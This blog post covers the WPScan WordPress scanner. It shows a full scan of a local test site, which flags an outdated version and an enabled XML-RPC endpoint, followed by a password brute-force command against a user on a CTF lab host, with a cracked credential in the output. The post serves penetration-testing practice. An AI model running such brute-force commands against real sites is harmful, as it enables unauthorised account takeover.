Skip to main content

WPScan - WordPress Security Scanner

https://wpscan.com/wordpress-security-scanner

Source code on GitHub: https://github.com/wpscanteam/wpscan

# wpscan --url http://127.0.0.1:8080
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://127.0.0.1:8080/ [127.0.0.1]
[+] Started: Sat Mar 13 09:41:21 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:8080/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://127.0.0.1:8080/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:8080/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.5 identified (Insecure, released on 2018-04-03).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:8080/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:8080/, Match: 'WordPress 4.9.5'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <===========================================> (22 / 22) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 13 09:41:32 2021
[+] Requests Done: 47
[+] Cached Requests: 4
[+] Data Sent: 11.353 KB
[+] Data Received: 122.766 KB
[+] Memory used: 193.074 MB
[+] Elapsed time: 00:00:11
#

Brute force password

wpscan --url http://10.10.87.140/wordpress -U elyana -P pass2.txt
...
[!] Valid Combinations Found:
 | Username: elyana, Password: H@ckme@123
...

Practice

>>> THM | Cyber Scotland 2021

>>> THM | Badbyte

>>> THM | Wekor

>>> THM | Internal

>>> THM | Different CTF

Labels:

Popular posts from this blog

[Microsoft Outlook]: Set .pst and .ost files location with ForcePSTPath Registry Key

Set .pst and .ost files location with ForcePSTPath Registry Key The ForcePSTPath registry key is supported by Microsoft Outlook 2003 and later. In Microsoft Outlook 2003 and 2007, it applies to new profiles only. Microsoft Outlook 2013 and Outlook 2016 it applies to new accounts created in a profile. Microsoft Outlook 2013 saves .pst in   %userprofile%\Documents\Outlook Files folder by default. We can change that default setting by adding a new string registry key called ForcePSTPath and set the value to the folder that we want to save those files. Set Microsoft Outlook 2013 always save new .pst and .ost files to D:\Data\Mail folder OST file reached the maximum size The OST File Has Reached The Maximum Size
Read more

Powershell: Test-NetConnection

PS C:\Users\tuyen> get-help Test-NetConnection NAME     Test-NetConnection SYNTAX     Test-NetConnection [[-ComputerName] <string>] [-TraceRoute] [-Hops <int>] [-InformationLevel {Quiet |     Detailed}]  [<CommonParameters>]     Test-NetConnection [[-ComputerName] <string>] [-CommonTCPPort] {HTTP | RDP | SMB | WINRM}     [-InformationLevel {Quiet | Detailed}]  [<CommonParameters>]     Test-NetConnection [[-ComputerName] <string>] -Port <int> [-InformationLevel {Quiet | Detailed}]     [<CommonParameters>]     Test-NetConnection [[-ComputerName] <string>] -DiagnoseRouting [-ConstrainSourceAddress <string>]     [-ConstrainInterface <uint32>] [-InformationLevel {Quiet | Detailed}]  [<CommonParameters>] ALIASES     TNC REMARKS     Get-Help cannot find the Help files fo...
Read more

Powershell: Install IIS

Run Powershell as Administrator, then run the command below to install IIS. Install-WindowsFeature Web-WebServer Check after installing Get-WindowsFeature *Web*
Read more